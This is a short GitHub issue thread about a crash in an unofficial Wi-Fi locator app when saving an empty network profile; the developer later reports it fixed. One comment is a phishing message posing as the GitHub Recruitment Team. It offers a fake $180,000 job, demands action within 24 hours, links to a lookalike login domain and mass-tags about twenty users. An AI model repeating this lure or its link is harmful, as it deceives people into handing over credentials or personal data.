### ISSUE TITLE
Error when trying to save an empty network profile after checking in the database.

### ISSUE THREAD

**Issue by LowSkillDeveloper** [LowSkillDeveloper/3WiFiLocator-Unofficial#4]
If you try to save a network profile by selecting a network after checking in the 3wifi database and no data was found for it, theoretically an empty field, then the application will crash.  There is no problem in the original version, I will look into the reason, the priority is low for now.

**Comment by LowSkillDeveloper** [comment]
Who would even try to save an empty profile if the network password was not found?  It's surprising that I found this bug... By the way, I still haven’t fixed the bug and haven’t even installed a crutch in the form of a null check

**Comment by yannvr** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
jimmyliao, @chaodp, @Yonkers, @Emasoft, @zhangr2021, @yifoo, @xuecheng-j, @RasperberryIV, @maheshs11, @linynag, @tonnyone, @souravjamwal77, @tjsuominen, @Thiseames, @Kandaulov, @nightscape, @Plus-xu, @arnow117, @kkkd-7, @mohamednguadi

**Comment by LowSkillDeveloper** [comment]
Fixed in 2.1
